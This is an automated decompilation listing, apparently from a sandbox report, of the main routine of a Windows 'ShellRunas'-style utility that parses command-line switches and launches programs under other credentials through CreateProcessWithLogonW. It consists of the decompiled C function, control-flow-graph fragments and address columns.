220->214 220->217 221->168 222 4025df-4025e7 221->222 222->168 223 4025ed-4025f5 222->223 223->168 224 4025fb-402603 223->224 224->168 225 402609-402611 224->225 225->168 226 402617-40261f 225->226 226->168 227 402625-40262d 226->227 227->168 228 402633-40263b 227->228 228->168 229 402641-402649 228->229 229->168 230 40264f-402657 229->230 230->168 231 40265d-402665 230->231 231->168 232 40266b-402673 231->232 232->168 233 402679-402681 232->233 233->168 234 402687-40268f 233->234 234->168 235 402695-40269d 234->235 235->168 236 4026a3-4026ab 235->236 236->168 237 4026b1-4026b9 236->237 237->168 238 4026bf-4026c7 237->238 238->168 239 4026cd-4026d5 238->239 239->168 240 4026db-4026e3 239->240 240->168 241 4026e9-4026f1 240->241 241->168 242 4026f7-4026ff 241->242 242->168 243 402705-40270d 242->243 243->168 244 402713-40271b 243->244 244->168 245 402721-402729 244->245 245->168 246 40272f-402737 245->246 246->168 247 40273d-402745 246->247 247->168 248 40274b-402753 247->248 248->168 249 402759-402761 248->249 249->168 250 402767-40276f 249->250 250->168 251 402775-40277d 250->251 251->168 252 402783-40278b 251->252 252->168 253 402791-402799 252->253 253->168 254 40279f-4027a7 253->254 254->168 255 4027ad-4027b5 254->255 255->168 256 4027bb-4027c3 255->256 256->168 257 4027c9-4027d1 256->257 257->168 258 4027d7-4027df 257->258 258->168 259 4027e5-4027ed 258->259 259->168 260 4027f3-4027fb 259->260 260->168 261 402801-402809 260->261 261->168 262 40280f-402818 261->262 262->168 263 40281e-402820 262->263 263->217 264 402822-402830 call 401880 263->264 264->118
                                                          C-Code - Quality: 76%
                                                          			E00402050(struct HINSTANCE__* __ecx, void __edx, void* __eflags, void* __fp0, void* _a4) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				short _v1052;
                                                          				char _v2082;
                                                          				char _v2084;
                                                          				char _v2762;
                                                          				char _v2764;
                                                          				char _v3282;
                                                          				char _v3284;
                                                          				char _v3802;
                                                          				char _v3804;
                                                          				struct _STARTUPINFOW _v3876;
                                                          				short _v3900;
                                                          				short _v3904;
                                                          				char _v3944;
                                                          				struct HWND__* _v3948;
                                                          				struct _WNDCLASSEXW _v4024;
                                                          				struct _PROCESS_INFORMATION _v4040;
                                                          				struct HWND__* _v4044;
                                                          				intOrPtr _v4048;
                                                          				intOrPtr _v4052;
                                                          				intOrPtr _v4056;
                                                          				char _v4060;
                                                          				void* _v4064;
                                                          				char _v4068;
                                                          				void* _v4072;
                                                          				char _v4073;
                                                          				void _v4080;
                                                          				void* _v4081;
                                                          				struct HWND__* _v4088;
                                                          				intOrPtr _v4092;
                                                          				void* _v4096;
                                                          				void* _v4100;
                                                          				void* _v4104;
                                                          				void* _v4132;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t183;
                                                          				struct HWND__* _t198;
                                                          				void* _t199;
                                                          				void* _t204;
                                                          				void* _t206;
                                                          				void* _t209;
                                                          				void* _t211;
                                                          				void* _t212;
                                                          				void* _t214;
                                                          				void* _t215;
                                                          				void* _t216;
                                                          				void* _t219;
                                                          				void* _t221;
                                                          				void* _t228;
                                                          				void* _t230;
                                                          				void* _t231;
                                                          				void* _t238;
                                                          				void* _t239;
                                                          				intOrPtr _t240;
                                                          				int _t241;
                                                          				short _t245;
                                                          				struct HWND__* _t246;
                                                          				void* _t248;
                                                          				signed int _t249;
                                                          				struct HWND__* _t252;
                                                          				void* _t253;
                                                          				short _t254;
                                                          				struct HWND__* _t256;
                                                          				void* _t258;
                                                          				void* _t259;
                                                          				void* _t273;
                                                          				void* _t275;
                                                          				void* _t276;
                                                          				void _t322;
                                                          				void* _t326;
                                                          				void* _t328;
                                                          				intOrPtr _t329;
                                                          				struct HINSTANCE__* _t333;
                                                          				struct HWND__* _t334;
                                                          				void* _t335;
                                                          				void* _t341;
                                                          				signed int _t342;
                                                          				void* _t343;
                                                          				signed int _t344;
                                                          				signed int _t346;
                                                          				signed int _t351;
                                                          				void* _t352;
                                                          				void* _t353;
                                                          				void* _t354;
                                                          				void* _t355;
                                                          				void* _t357;
                                                          				void* _t372;
                                                          
                                                          				_t372 = __fp0;
                                                          				_t346 = (_t344 & 0xfffffff8) - 0xff4;
                                                          				_t183 =  *0x413004; // 0xf284055d
                                                          				_v8 = _t183 ^ _t346;
                                                          				_t322 = __edx;
                                                          				_t333 = __ecx;
                                                          				_v4080 = __edx;
                                                          				_v4088 = 0;
                                                          				_v2764 = 0;
                                                          				E00409280(__edx,  &_v2762, 0, 0x2a2);
                                                          				_v2084 = 0;
                                                          				E00409280(_t322,  &_v2082, 0, 0x402);
                                                          				_v3284 = 0;
                                                          				E00409280(_t322,  &_v3282, 0, 0x200);
                                                          				_v3804 = 0;
                                                          				E00409280(_t322,  &_v3802, 0, 0x206);
                                                          				_v3948 = 0;
                                                          				E00409280(_t322,  &_v3944, 0, 0x40);
                                                          				_v4060 = 0;
                                                          				_v4068 = 0;
                                                          				_v4044 = 0;
                                                          				_v4072 = 0;
                                                          				_v4081 = 0;
                                                          				_v4073 = 0;
                                                          				_t351 = _t346 + 0x3c;
                                                          				_v4056 = 0;
                                                          				_v4052 = 0;
                                                          				_v4048 = 0;
                                                          				E00401800(_t322,  &_a4, _t333);
                                                          				_t273 = _a4;
                                                          				if(_t273 < 2) {
                                                          					L96:
                                                          					_v4024.cbSize = 0x30;
                                                          					_v4024.style = 3;
                                                          					_v4024.lpfnWndProc = E00401D50;
                                                          					_v4024.cbClsExtra = 0;
                                                          					_v4024.cbWndExtra = 0x1e;
                                                          					_v4024.hInstance = _t333;
                                                          					_v4024.hIcon = LoadIconW(_t333, L"ICON");
                                                          					_v4024.hIconSm.hwnd = LoadIconW(_t333, L"ICON");
                                                          					_v4024.hCursor = LoadCursorW(0, 0x7f00);
                                                          					_v4024.hbrBackground = 0x10;
                                                          					_v4024.lpszMenuName = 0;
                                                          					_v4024.lpszClassName = L"SHELLRUNAS";
                                                          					RegisterClassExW( &_v4024);
                                                          					_t198 = CreateDialogParamW(_t333, L"AboutUsage", 0, E00401D50, 0);
                                                          					_t310 =  &(_v4024.hIconSm);
                                                          					_t334 = _t198;
                                                          					_t199 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
                                                          					__eflags = _t199;
                                                          					if(_t199 == 0) {
                                                          						L100:
                                                          						_v4092 = 0x57;
                                                          						L101:
                                                          						LocalFree(_v4072);
                                                          						_pop(_t326);
                                                          						_pop(_t335);
                                                          						_pop(_t275);
                                                          						return E0040318A(_v4092, _t275, _v12 ^ _t351, _t310, _t326, _t335);
                                                          					} else {
                                                          						goto L97;
                                                          					}
                                                          					do {
                                                          						L97:
                                                          						_t204 = IsDialogMessageW(_t334,  &(_v4024.hIconSm));
                                                          						__eflags = _t204;
                                                          						if(_t204 == 0) {
                                                          							TranslateMessage( &(_v4024.hIconSm));
                                                          							_t310 =  &(_v4024.hIconSm);
                                                          							DispatchMessageW( &(_v4024.hIconSm));
                                                          						}
                                                          						_t206 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
                                                          						__eflags = _t206;
                                                          					} while (_t206 != 0);
                                                          					goto L100;
                                                          				}
                                                          				_t328 = _v4080 + 4;
                                                          				_v4064 = _t328;
                                                          				_t209 = E0040346A(_t273, _t343,  *(_v4080 + 4), L"/?");
                                                          				_t351 = _t351 + 8;
                                                          				if(_t209 == 0) {
                                                          					goto L96;
                                                          				}
                                                          				_t211 = E0040346A(_t273, _t343,  *_t328, L"/raw");
                                                          				_t352 = _t351 + 8;
                                                          				if(_t211 != 0) {
                                                          					_t310 =  *_t328;
                                                          					_t212 = E0040346A(_t273, _t343, _t310, L"/reg");
                                                          					_t353 = _t352 + 8;
                                                          					__eflags = _t212;
                                                          					if(_t212 != 0) {
                                                          						_t214 = E0040346A(_t273, _t343,  *_t328, L"/regnetonly");
                                                          						_t354 = _t353 + 8;
                                                          						__eflags = _t214;
                                                          						if(_t214 != 0) {
                                                          							_t286 =  *_t328;
                                                          							_t215 = E0040346A(_t273, _t343,  *_t328, L"/unreg");
                                                          							_t355 = _t354 + 8;
                                                          							__eflags = _t215;
                                                          							if(_t215 != 0) {
                                                          								_t216 = E0040346A(_t273, _t343,  *_t328, L"/netonly");
                                                          								_t352 = _t355 + 8;
                                                          								__eflags = _t216;
                                                          								if(_t216 == 0) {
                                                          									__eflags = _t273 - 2;
                                                          									_v4072 = 1;
                                                          									if(_t273 > 2) {
                                                          										_t341 = _v4080 + 8;
                                                          										__eflags = _t341;
                                                          										memcpy(_t328, _t341, _t273 - 2 << 2);
                                                          										_t352 = _t352 + 0xc;
                                                          										_t328 = _v4064;
                                                          									}
                                                          									__eflags = _t273;
                                                          								}
                                                          								L28:
                                                          								E004036E5( &_v3804, 0x104,  *_t328);
                                                          								_t310 =  &_v3804;
                                                          								_t219 = E004029C0( *_t328, __eflags, _t372,  &_v3804);
                                                          								_t357 = _t352 + 0x10;
                                                          								__eflags = _t219;
                                                          								_v4088 = _t219;
                                                          								if(__eflags == 0) {
                                                          									_push( &_v4068);
                                                          									_push(_v4072);
                                                          									_push(_v4080);
                                                          									_t310 =  &_v3804;
                                                          									_t221 = E00402F60(_t273,  &_v4073,  &_v3804, __eflags, _t372);
                                                          									_t351 = _t357 + 0xc;
                                                          									__eflags = _t221;
                                                          									_v4088 = _t221;
                                                          									if(_t221 != 0) {
                                                          										goto L101;
                                                          									} else {
                                                          										goto L31;
                                                          									}
                                                          									while(1) {
                                                          										L31:
                                                          										E00409280(_t328,  &_v2084, 0, 0x202);
                                                          										E00409280(_t328,  &_v2764, 0, 0x152);
                                                          										E00409280(_t328,  &_v3284, 0, 0x101);
                                                          										_push(_v4088);
                                                          										_push( &_v3284);
                                                          										_t310 =  &_v2084;
                                                          										_push( &_v2084);
                                                          										_push(_v4072);
                                                          										_t328 =  &_v2764;
                                                          										_t228 = E00402CB0( *_v4064, _t328, __eflags, _t372);
                                                          										_t351 = _t351 + 0x34;
                                                          										__eflags = _t228;
                                                          										_v4088 = _t228;
                                                          										if(_t228 != 0) {
                                                          											goto L101;
                                                          										}
                                                          										_t276 = _v4072;
                                                          										__eflags = _t276;
                                                          										_t230 =  &_v3284;
                                                          										_v3948 = 0x44;
                                                          										_t310 =  &_v2084;
                                                          										_v3904 = 1;
                                                          										_v3900 = 1;
                                                          										__imp__CreateProcessWithLogonW( &_v2084, _t328, _t230, (0 | _t276 != 0x00000000) + 1, 0, _v4068, 0, 0, 0,  &_v3948,  &_v4060);
                                                          										__eflags = _t230;
                                                          										if(_t230 != 0) {
                                                          											__eflags = _t276;
                                                          											if(_t276 == 0) {
                                                          												L37:
                                                          												__eflags = _v4132 - 0x52e;
                                                          												if(_v4132 == 0x52e) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x8007052e;
                                                          												if(_v4132 == 0x8007052e) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc000006d;
                                                          												if(_v4132 == 0xc000006d) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd000006d;
                                                          												if(_v4132 == 0xd000006d) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 5;
                                                          												if(_v4132 == 5) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070005;
                                                          												if(_v4132 == 0x80070005) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000022;
                                                          												if(_v4132 == 0xc0000022) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000022;
                                                          												if(_v4132 == 0xd0000022) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x56;
                                                          												if(_v4132 == 0x56) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070056;
                                                          												if(_v4132 == 0x80070056) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc000006a;
                                                          												if(_v4132 == 0xc000006a) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd000006a;
                                                          												if(_v4132 == 0xd000006a) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x8009030e;
                                                          												if(_v4132 == 0x8009030e) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x8009030c;
                                                          												if(_v4132 == 0x8009030c) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x4f1;
                                                          												if(_v4132 == 0x4f1) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x800704f1;
                                                          												if(_v4132 == 0x800704f1) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000388;
                                                          												if(_v4132 == 0xc0000388) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000388;
                                                          												if(_v4132 == 0xd0000388) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x532;
                                                          												if(_v4132 == 0x532) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070532;
                                                          												if(_v4132 == 0x80070532) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000071;
                                                          												if(_v4132 == 0xc0000071) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000071;
                                                          												if(_v4132 == 0xd0000071) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x773;
                                                          												if(_v4132 == 0x773) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070773;
                                                          												if(_v4132 == 0x80070773) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000224;
                                                          												if(_v4132 == 0xc0000224) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000224;
                                                          												if(_v4132 == 0xd0000224) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x8c2;
                                                          												if(_v4132 == 0x8c2) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x800708c2;
                                                          												if(_v4132 == 0x800708c2) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x78f;
                                                          												if(_v4132 == 0x78f) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x8007078f;
                                                          												if(_v4132 == 0x8007078f) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000413;
                                                          												if(_v4132 == 0xc0000413) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000413;
                                                          												if(_v4132 == 0xd0000413) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x533;
                                                          												if(_v4132 == 0x533) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070533;
                                                          												if(_v4132 == 0x80070533) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000072;
                                                          												if(_v4132 == 0xc0000072) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000072;
                                                          												if(_v4132 == 0xd0000072) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x52f;
                                                          												if(_v4132 == 0x52f) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x8007052f;
                                                          												if(_v4132 == 0x8007052f) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc000006e;
                                                          												if(_v4132 == 0xc000006e) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd000006e;
                                                          												if(_v4132 == 0xd000006e) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x775;
                                                          												if(_v4132 == 0x775) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070775;
                                                          												if(_v4132 == 0x80070775) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000234;
                                                          												if(_v4132 == 0xc0000234) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000234;
                                                          												if(_v4132 == 0xd0000234) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x701;
                                                          												if(_v4132 == 0x701) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070701;
                                                          												if(_v4132 == 0x80070701) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc0000193;
                                                          												if(_v4132 == 0xc0000193) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xd0000193;
                                                          												if(_v4132 == 0xd0000193) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x569;
                                                          												if(_v4132 == 0x569) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0x80070569;
                                                          												if(_v4132 == 0x80070569) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _v4132 - 0xc000015b;
                                                          												if(_v4132 == 0xc000015b) {
                                                          													continue;
                                                          												}
                                                          												_t231 = _v4132;
                                                          												__eflags = _t231 - 0xd000015b;
                                                          												if(_t231 == 0xd000015b) {
                                                          													continue;
                                                          												}
                                                          												__eflags = _t231;
                                                          												if(_t231 == 0) {
                                                          													L95:
                                                          													_t310 = _v4104;
                                                          													CloseHandle(_v4104);
                                                          													CloseHandle(_v4100);
                                                          													goto L101;
                                                          												}
                                                          												E00401880(L"Error launching application", _t231);
                                                          												_t351 = _t351 + 4;
                                                          												goto L101;
                                                          											}
                                                          											E00403926( &(_v3876.dwYSize), 0x104);
                                                          											_t238 = E0040360D( &(_v3876.dwYSize), L"cmd.exe");
                                                          											_t351 = _t351 + 0x10;
                                                          											__eflags = _t238;
                                                          											if(_t238 != 0) {
                                                          												goto L37;
                                                          											}
                                                          											_t310 =  &_v4096;
                                                          											_t239 = EnumWindows(E00402000,  &_v4096);
                                                          											__eflags = _t239;
                                                          											if(_t239 != 0) {
                                                          												_t329 = _v4092;
                                                          												while(1) {
                                                          													__eflags = _v4100;
                                                          													if(_v4100 == 0) {
                                                          														goto L95;
                                                          													}
                                                          													_t240 = _t329;
                                                          													_t329 = _t329 + 1;
                                                          													__eflags = _t240 - 5;
                                                          													if(_t240 >= 5) {
                                                          														goto L95;
                                                          													}
                                                          													Sleep(0xa);
                                                          													_t241 = EnumWindows(E00402000,  &_v4100);
                                                          													__eflags = _t241;
                                                          													if(_t241 != 0) {
                                                          														continue;
                                                          													}
                                                          													goto L95;
                                                          												}
                                                          												goto L95;
                                                          											}
                                                          											goto L37;
                                                          										}
                                                          										_v4132 = GetLastError();
                                                          										goto L37;
                                                          									}
                                                          									goto L101;
                                                          								}
                                                          								E00401880(L"Error launching program", _t219);
                                                          								_t351 = _t357 + 4;
                                                          								goto L101;
                                                          							}
                                                          							__eflags = _t273 - 2;
                                                          							if(_t273 <= 2) {
                                                          								L22:
                                                          								_t245 = _v4081;
                                                          								L23:
                                                          								__eflags = _t245;
                                                          								_t246 = E00401930(_t286 & 0xffffff00 | _t245 == 0x00000000);
                                                          								_t351 = _t355 + 4;
                                                          								_v4088 = _t246;
                                                          								goto L101;
                                                          							}
                                                          							_t310 = _v4080;
                                                          							_t248 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/quiet");
                                                          							_t355 = _t355 + 8;
                                                          							__eflags = _t248;
                                                          							_t245 = 1;
                                                          							if(_t248 == 0) {
                                                          								goto L23;
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          						__eflags = _t273 - 2;
                                                          						if(_t273 <= 2) {
                                                          							L17:
                                                          							_t249 = _v4081;
                                                          							L18:
                                                          							__eflags = _t249;
                                                          							_t252 = E00401BA0(1, _t333, _t249, _t249 & 0xffffff00 | _t249 == 0x00000000);
                                                          							_t351 = _t354 + 4;
                                                          							_v4088 = _t252;
                                                          							goto L101;
                                                          						}
                                                          						_t310 =  *(_v4080 + 8);
                                                          						_t253 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/quiet");
                                                          						_t354 = _t354 + 8;
                                                          						__eflags = _t253;
                                                          						_t249 = 1;
                                                          						if(_t253 == 0) {
                                                          							goto L18;
                                                          						}
                                                          						goto L17;
                                                          					}
                                                          					__eflags = _t273 - 2;
                                                          					if(_t273 <= 2) {
                                                          						L12:
                                                          						_t254 = _v4081;
                                                          						L13:
                                                          						__eflags = _t254;
                                                          						_t256 = E00401BA0(0, _t333, __eflags, _t310);
                                                          						_t351 = _t353 + 4;
                                                          						_v4088 = _t256;
                                                          						goto L101;
                                                          					}
                                                          					_t258 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/quiet");
                                                          					_t353 = _t353 + 8;
                                                          					__eflags = _t258;
                                                          					_t254 = 1;
                                                          					if(_t258 == 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          				_t342 = 2;
                                                          				if(_t273 <= 2) {
                                                          					goto L28;
                                                          				}
                                                          				_t259 = E0040346A(_t273, _t343,  *(_v4080 + 8), L"/netonly");
                                                          				_t352 = _t352 + 8;
                                                          				if(_t259 == 0) {
                                                          					_t30 = _t259 + 3; // 0x3
                                                          					_t342 = _t30;
                                                          					SetEnvironmentVariableW(L"__COMPAT_LAYER", L"RunAsInvoker");
                                                          				}
                                                          				if(_t273 <= _t342) {
                                                          					goto L28;
                                                          				}
                                                          				E00409280(_t328,  &(_v3876.lpReserved), 0, 0x40);
                                                          				_v4040.hProcess = 0;
                                                          				_v4040.hThread = 0;
                                                          				_v4040.dwProcessId = 0;
                                                          				_v4040.dwThreadId = 0;
                                                          				_v3876.cb = 0x44;
                                                          				_v3876.wShowWindow = 1;
                                                          				E004036E5( &_v1052, 0x208, L"cmd /c start ");
                                                          				E0040366B( &_v1052, 0x208,  *((intOrPtr*)(_v4080 + _t342 * 4)));
                                                          				_t351 = _t352 + 0x24;
                                                          				_t310 =  &_v4040;
                                                          				if(CreateProcessW(0,  &_v1052, 0, 0, 0, 0x8000000, 0, 0,  &_v3876,  &_v4040) == 0) {
                                                          					_v4088 = GetLastError();
                                                          				}
                                                          				goto L101;
                                                          			}






























































































                                                          0x00402050
                                                          0x00402056
                                                          0x0040205c
                                                          0x00402063
                                                          0x0040207b
                                                          0x0040207f
                                                          0x00402081
                                                          0x00402085
                                                          0x00402089
                                                          0x00402091
                                                          0x004020a7
                                                          0x004020af
                                                          0x004020c5
                                                          0x004020cd
                                                          0x004020e3
                                                          0x004020eb
                                                          0x004020fe
                                                          0x00402105
                                                          0x0040210c
                                                          0x00402110
                                                          0x00402114
                                                          0x00402118
                                                          0x0040211c
                                                          0x00402120
                                                          0x00402126
                                                          0x0040212c
                                                          0x00402130
                                                          0x00402134
                                                          0x00402138
                                                          0x0040213d
                                                          0x00402143
                                                          0x00402881
                                                          0x0040288f
                                                          0x00402897
                                                          0x0040289f
                                                          0x004028a7
                                                          0x004028ab
                                                          0x004028b3
                                                          0x004028bf
                                                          0x004028cb
                                                          0x004028dd
                                                          0x004028e1
                                                          0x004028e9
                                                          0x004028ed
                                                          0x004028f5
                                                          0x00402908
                                                          0x00402917
                                                          0x0040291f
                                                          0x00402921
                                                          0x00402923
                                                          0x00402925
                                                          0x0040295e
                                                          0x0040295e
                                                          0x00402966
                                                          0x0040296b
                                                          0x0040297c
                                                          0x0040297d
                                                          0x0040297e
                                                          0x00402989
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402927
                                                          0x00402927
                                                          0x0040292d
                                                          0x00402933
                                                          0x00402935
                                                          0x0040293c
                                                          0x00402942
                                                          0x00402947
                                                          0x00402947
                                                          0x00402958
                                                          0x0040295a
                                                          0x0040295a
                                                          0x00000000
                                                          0x00402927
                                                          0x00402150
                                                          0x00402159
                                                          0x0040215d
                                                          0x00402162
                                                          0x00402167
                                                          0x00000000
                                                          0x00000000
                                                          0x00402175
                                                          0x0040217a
                                                          0x0040217f
                                                          0x0040227f
                                                          0x00402287
                                                          0x0040228c
                                                          0x0040228f
                                                          0x00402291
                                                          0x004022d8
                                                          0x004022dd
                                                          0x004022e0
                                                          0x004022e2
                                                          0x00402321
                                                          0x00402329
                                                          0x0040232e
                                                          0x00402331
                                                          0x00402333
                                                          0x00402378
                                                          0x0040237d
                                                          0x00402380
                                                          0x00402382
                                                          0x00402384
                                                          0x00402387
                                                          0x0040238c
                                                          0x00402392
                                                          0x00402392
                                                          0x00402398
                                                          0x00402398
                                                          0x0040239a
                                                          0x0040239a
                                                          0x0040239e
                                                          0x0040239e
                                                          0x004023a1
                                                          0x004023b1
                                                          0x004023b8
                                                          0x004023c3
                                                          0x004023c8
                                                          0x004023cb
                                                          0x004023cd
                                                          0x004023d1
                                                          0x004023f2
                                                          0x004023f3
                                                          0x004023f4
                                                          0x004023f9
                                                          0x00402400
                                                          0x00402405
                                                          0x00402408
                                                          0x0040240a
                                                          0x0040240e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402414
                                                          0x00402414
                                                          0x00402423
                                                          0x0040243a
                                                          0x00402451
                                                          0x0040245d
                                                          0x00402469
                                                          0x00402470
                                                          0x00402477
                                                          0x00402478
                                                          0x00402479
                                                          0x00402480
                                                          0x00402485
                                                          0x00402488
                                                          0x0040248a
                                                          0x0040248e
                                                          0x00000000
                                                          0x00000000
                                                          0x00402494
                                                          0x004024af
                                                          0x004024be
                                                          0x004024c7
                                                          0x004024d7
                                                          0x004024df
                                                          0x004024e6
                                                          0x004024ee
                                                          0x004024f4
                                                          0x004024f6
                                                          0x00402504
                                                          0x00402506
                                                          0x0040254b
                                                          0x0040254b
                                                          0x00402553
                                                          0x00000000
                                                          0x00000000
                                                          0x00402559
                                                          0x00402561
                                                          0x00000000
                                                          0x00000000
                                                          0x00402567
                                                          0x0040256f
                                                          0x00000000
                                                          0x00000000
                                                          0x00402575
                                                          0x0040257d
                                                          0x00000000
                                                          0x00000000
                                                          0x00402583
                                                          0x00402588
                                                          0x00000000
                                                          0x00000000
                                                          0x0040258e
                                                          0x00402596
                                                          0x00000000
                                                          0x00000000
                                                          0x0040259c
                                                          0x004025a4
                                                          0x00000000
                                                          0x00000000
                                                          0x004025aa
                                                          0x004025b2
                                                          0x00000000
                                                          0x00000000
                                                          0x004025b8
                                                          0x004025bd
                                                          0x00000000
                                                          0x00000000
                                                          0x004025c3
                                                          0x004025cb
                                                          0x00000000
                                                          0x00000000
                                                          0x004025d1
                                                          0x004025d9
                                                          0x00000000
                                                          0x00000000
                                                          0x004025df
                                                          0x004025e7
                                                          0x00000000
                                                          0x00000000
                                                          0x004025ed
                                                          0x004025f5
                                                          0x00000000
                                                          0x00000000
                                                          0x004025fb
                                                          0x00402603
                                                          0x00000000
                                                          0x00000000
                                                          0x00402609
                                                          0x00402611
                                                          0x00000000
                                                          0x00000000
                                                          0x00402617
                                                          0x0040261f
                                                          0x00000000
                                                          0x00000000
                                                          0x00402625
                                                          0x0040262d
                                                          0x00000000
                                                          0x00000000
                                                          0x00402633
                                                          0x0040263b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402641
                                                          0x00402649
                                                          0x00000000
                                                          0x00000000
                                                          0x0040264f
                                                          0x00402657
                                                          0x00000000
                                                          0x00000000
                                                          0x0040265d
                                                          0x00402665
                                                          0x00000000
                                                          0x00000000
                                                          0x0040266b
                                                          0x00402673
                                                          0x00000000
                                                          0x00000000
                                                          0x00402679
                                                          0x00402681
                                                          0x00000000
                                                          0x00000000
                                                          0x00402687
                                                          0x0040268f
                                                          0x00000000
                                                          0x00000000
                                                          0x00402695
                                                          0x0040269d
                                                          0x00000000
                                                          0x00000000
                                                          0x004026a3
                                                          0x004026ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004026b1
                                                          0x004026b9
                                                          0x00000000
                                                          0x00000000
                                                          0x004026bf
                                                          0x004026c7
                                                          0x00000000
                                                          0x00000000
                                                          0x004026cd
                                                          0x004026d5
                                                          0x00000000
                                                          0x00000000
                                                          0x004026db
                                                          0x004026e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004026e9
                                                          0x004026f1
                                                          0x00000000
                                                          0x00000000
                                                          0x004026f7
                                                          0x004026ff
                                                          0x00000000
                                                          0x00000000
                                                          0x00402705
                                                          0x0040270d
                                                          0x00000000
                                                          0x00000000
                                                          0x00402713
                                                          0x0040271b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402721
                                                          0x00402729
                                                          0x00000000
                                                          0x00000000
                                                          0x0040272f
                                                          0x00402737
                                                          0x00000000
                                                          0x00000000
                                                          0x0040273d
                                                          0x00402745
                                                          0x00000000
                                                          0x00000000
                                                          0x0040274b
                                                          0x00402753
                                                          0x00000000
                                                          0x00000000
                                                          0x00402759
                                                          0x00402761
                                                          0x00000000
                                                          0x00000000
                                                          0x00402767
                                                          0x0040276f
                                                          0x00000000
                                                          0x00000000
                                                          0x00402775
                                                          0x0040277d
                                                          0x00000000
                                                          0x00000000
                                                          0x00402783
                                                          0x0040278b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402791
                                                          0x00402799
                                                          0x00000000
                                                          0x00000000
                                                          0x0040279f
                                                          0x004027a7
                                                          0x00000000
                                                          0x00000000
                                                          0x004027ad
                                                          0x004027b5
                                                          0x00000000
                                                          0x00000000
                                                          0x004027bb
                                                          0x004027c3
                                                          0x00000000
                                                          0x00000000
                                                          0x004027c9
                                                          0x004027d1
                                                          0x00000000
                                                          0x00000000
                                                          0x004027d7
                                                          0x004027df
                                                          0x00000000
                                                          0x00000000
                                                          0x004027e5
                                                          0x004027ed
                                                          0x00000000
                                                          0x00000000
                                                          0x004027f3
                                                          0x004027fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00402801
                                                          0x00402809
                                                          0x00000000
                                                          0x00000000
                                                          0x0040280f
                                                          0x00402813
                                                          0x00402818
                                                          0x00000000
